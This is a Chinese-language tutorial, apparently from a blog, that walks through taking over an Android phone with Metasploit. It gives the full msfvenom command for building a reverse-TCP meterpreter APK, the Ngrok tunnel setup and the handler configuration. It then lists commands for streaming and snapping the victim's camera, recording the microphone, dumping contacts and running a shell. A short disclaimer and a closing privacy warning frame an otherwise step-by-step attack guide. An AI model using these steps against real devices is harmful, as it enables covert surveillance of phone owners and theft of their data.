一. 前言:
嚴正宣告:本文僅限於技術討論與分享,嚴禁用於非法途徑。
實驗目的:演示如何使用Kali裡的Metasploit控制安卓手機
內網穿透原理:內網穿透相當於先將資料發給伺服器,然後由伺服器發給內網中的我們
二. 環境準備
注:具體下載和使用方法我就不講了,百度上都有,講起來太長了
1.kali linux(攻擊方)
2.Ngrok(小米球)
下載linux版本並註冊一個帳號來開通一個免費的隧道,用於接下來的埠對映
3.安卓模擬器(因為博主沒有安卓手機,所以用模擬器)
注:比較推薦用模擬器,因為這個漏洞挺久遠的,所以不支援高版本的手機,目前我測試了7.0以上好像是不行的(至少我沒成功,有成功的歡迎來教教我),靶機我用的是版本為5.1的安卓
三. 開始實驗
1. 啟動內網穿透工具Ngrok
命令: ./xiaomiqiu_start.sh(在xiaomiqiu檔案右擊在此開啟終端並輸入此命令)
2.檢視kali的ip
命令:ifconfig
3. 用Metasploit生成載有惡意Payload的Android的apk
命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk
解釋: lhost=192.168.121.128 (這是Kali的IP)lport=8080 (預設4444,可以自定義,這裡要與Ngrok的相同)
4. 啟動msfconsole,設定模組
命令1:msfconsole
命令2:use exploit/multi/handler
5. 設定payload和監聽
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.121.128 //這裡的地址設定成我們剛才生成木馬的IP地址
set lport 8080 //這裡的埠設定成剛才我們生成木馬所監聽的埠
6. 檢查配置是否正確
命令:options
四.攻擊
1. 入侵
命令:exploit或者run
這個時候就監聽就開啟了,然後使用手機安裝剛才生成的病毒檔案(拉檔案就不用演示了吧)
2. 此時手動點選剛才手機中安裝的MainActivity
程式圖示(沒有介面)
3.當受害者點選以後便可成功建立攻擊會話
五. 攻擊命令
1.開啟攝像頭並錄影
命令:webcam_stream
2.檢視手機系統資訊
命令:sysinfo
3.匯出手機通訊錄
命令:dump_contacts
4.呼叫攝像頭拍照
命令:webcam_snap
5.錄製聲音
命令: record_mic
6.成功建立攻擊會話後可以對受害者手機進行像Linux主機shell一樣對手機進行命令執行操作
至此,本次演示結束,其他一些命令我就不一一演示了,有興趣的話可自行藉助help命令或者?給出的使用命令描述進行體驗。
溫馨提示:請不要隨便安裝陌生人的軟體,可能會洩露自己的隱私!